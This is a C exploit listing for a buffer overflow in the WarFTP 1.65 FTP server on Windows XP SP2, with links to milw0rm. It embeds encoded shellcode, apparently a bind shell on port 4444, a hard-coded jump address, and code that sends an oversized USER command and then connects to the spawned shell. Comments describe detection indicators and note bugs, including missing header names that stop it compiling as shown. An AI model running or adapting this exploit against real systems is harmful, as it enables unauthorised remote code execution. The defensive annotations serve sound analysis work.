warftp1.65 exploit for winxp sp2

/********** warftp1.65 exploit made by hacker2005/netwind****************/
#include
#include
#pragma comment(lib,"ws2_32")
/*
 * Bytes that main() copies into the USER line at offset 504 and sends
 * verbatim; nothing in this file interprets them, so their behaviour is
 * not verifiable from the C code. main()'s final printf() suggests the
 * payload listens on TCP/4444 (the author's claim, not something this
 * listing demonstrates). The opening bytes resemble a self-decoding
 * (XOR) stub, so most of the buffer is not readable as plain machine
 * code; confirm with a disassembler before deriving any signature from
 * it. For detection the more robust indicators are the ones visible in
 * main(): a USER argument of several hundred bytes, a long 0x90 run, and
 * a follow-up connection to port 4444.
 */
char shellcode[] =
"/x31/xc9/x83/xe9/xb0/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xad"
"/x7f/x6d/x80/x83/xeb/xfc/xe2/xf4/x51/x15/x86/xcd/x45/x86/x92/x7f"
"/x52/x1f/xe6/xec/x89/x5b/xe6/xc5/x91/xf4/x11/x85/xd5/x7e/x82/x0b"
"/xe2/x67/xe6/xdf/x8d/x7e/x86/xc9/x26/x4b/xe6/x81/x43/x4e/xad/x19"
"/x01/xfb/xad/xf4/xaa/xbe/xa7/x8d/xac/xbd/x86/x74/x96/x2b/x49/xa8"
"/xd8/x9a/xe6/xdf/x89/x7e/x86/xe6/x26/x73/x26/x0b/xf2/x63/x6c/x6b"
"/xae/x53/xe6/x09/xc1/x5b/x71/xe1/x6e/x4e/xb6/xe4/x26/x3c/x5d/x0b"
"/xed/x73/xe6/xf0/xb1/xd2/xe6/xc0/xa5/x21/x05/x0e/xe3/x71/x81/xd0"
"/x52/xa9/x0b/xd3/xcb/x17/x5e/xb2/xc5/x08/x1e/xb2/xf2/x2b/x92/x50"
"/xc5/xb4/x80/x7c/x96/x2f/x92/x56/xf2/xf6/x88/xe6/x2c/x92/x65/x82"
"/xf8/x15/x6f/x7f/x7d/x17/xb4/x89/x58/xd2/x3a/x7f/x7b/x2c/x3e/xd3"
"/xfe/x2c/x2e/xd3/xee/x2c/x92/x50/xcb/x17/x7c/xdc/xcb/x2c/xe4/x61"
"/x38/x17/xc9/x9a/xdd/xb8/x3a/x7f/x7b/x15/x7d/xd1/xf8/x80/xbd/xe8"
"/x09/xd2/x43/x69/xfa/x80/xbb/xd3/xf8/x80/xbd/xe8/x48/x36/xeb/xc9"
"/xfa/x80/xbb/xd0/xf9/x2b/x38/x7f/x7d/xec/x05/x67/xd4/xb9/x14/xd7"
"/x52/xa9/x38/x7f/x7d/x19/x07/xe4/xcb/x17/x0e/xed/x24/x9a/x07/xd0"
"/xf4/x56/xa1/x09/x4a/x15/x29/x09/x4f/x4e/xad/x73/x07/x81/x2f/xad"
"/x53/x3d/x41/x13/x20/x05/x55/x2b/x06/xd4/x05/xf2/x53/xcc/x7b/x7f"
"/xd8/x3b/x92/x56/xf6/x28/x3f/xd1/xfc/x2e/x07/x81/xfc/x2e/x38/xd1"
"/x52/xaf/x05/x2d/x74/x7a/xa3/xd3/x52/xa9/x07/x7f/x52/x48/x92/x50"
"/x26/x28/x91/x03/x69/x1b/x92/x56/xff/x80/xbd/xe8/x5d/xf5/x69/xdf"
"/xfe/x80/xbb/x7f/x7d/x7f/x6d/x80";
/*
 * Sends one over-long FTP USER command to the host in remote_host on
 * TCP/21, waits a second, then runs the local telnet client against
 * port 4444 on the same host. Everything happens on the client side;
 * no server reply is ever read.
 *
 * What a defender can observe (all taken from the lines below):
 *   - a single USER command of sizeof(buf)-1 = 849 bytes, filled with
 *     0x90 apart from the 5-byte verb, a 4-byte address at offset 490,
 *     the payload at offset 504 and the trailing line end;
 *   - a second connection to TCP/4444 on the same host about 1 s later.
 * A length limit on FTP command arguments at the server, or an IDS rule
 * on USER arguments of hundreds of bytes, catches the first; the second
 * is an unexpected port in use on an FTP host.
 *
 * The address written at offset 490 is hard-coded (see the author's
 * comment on that line), which is why the title pins the target to one
 * OS/service pack: a different module base, address-space randomisation
 * or a non-executable stack stops that step.
 *
 * Note: the two #include lines at the top of the page lost their header
 * names in this rendering, so the listing does not compile as shown.
 */
int main()
{
 WSADATA wsa;
 WSAStartup (MAKEWORD(1,1), &wsa);   // Winsock 1.1; return value not checked
 SOCKET s,s1;
 struct sockaddr_in target;
 char buf[850];                   // the whole USER line; memset() below fills bytes 0..848
 char remote_host[]="127.0.0.1";   // target host, hard-coded to the local machine
 char command[]="telnet ";        // sized by its initializer (8 bytes incl. NUL); the strcat() calls below overrun it
 printf("warftp1.65 exploit made by hacker2005/n");
 s=socket(AF_INET,SOCK_STREAM,0);   // not checked against INVALID_SOCKET
 target.sin_family=AF_INET;
 target.sin_addr.s_addr=inet_addr(remote_host);
 target.sin_port=htons(21);         // FTP control port
 s1=connect(s,(struct sockaddr *)&target,sizeof(target));   // s1 is a SOCKET but holds connect()'s int status
 if(s1==-1)   // -1 converts to the unsigned SOCKET type, so the comparison still works
    {
        printf("[-] connect err./n");
  printf("ftp service isn't open/n");
        exit(1);
    }
 memset(buf,0x90,sizeof(buf)-1);   // bytes 0..848 = 0x90; buf[849] is never written and never sent
 memcpy(buf,"USER ",5);            // offset 0: FTP verb; buf is raw bytes, not a C string
 memcpy(buf+5+485,"/xfb/xc5/xd7/x77",4);                     // offset 490: author's comment names jmp esp at 77d7c5fb (fixed, build-specific)
    memcpy(buf+5+485+4+10,shellcode,sizeof(shellcode)-1);   // offset 504: payload; the 10 bytes before it stay 0x90
 memcpy(buf+5+485+4+10+sizeof(shellcode)-1,"/r/n",sizeof("/r/n"));   // sizeof("/r/n") includes the literal's NUL, so one extra byte is copied
 SOCKET ret=send(s,buf,sizeof(buf)-1,0);   // send() returns int; SOCKET is unsigned on Win32, so the ret<0 test below is never true and send failures go unnoticed
    if(ret<0)
 {
  printf("send err/n");
  return -1;
 }
 Sleep(1000);   // one second before connecting to 4444
 printf("try telnet remote host with port 4444/n");
 strcat(command,remote_host);   // writes past the end of command[] (undefined behaviour)
 strcat(command," 4444");       // same overrun continued
 system(command);               // hands "telnet <host> 4444" to the command interpreter
 WSACleanup();                  // s is never closesocket()'d; main relies on C99's implicit return 0
}
more information:
http://www.milw0rm.com/exploits/3474
http://www.milw0rm.com/exploits/3482
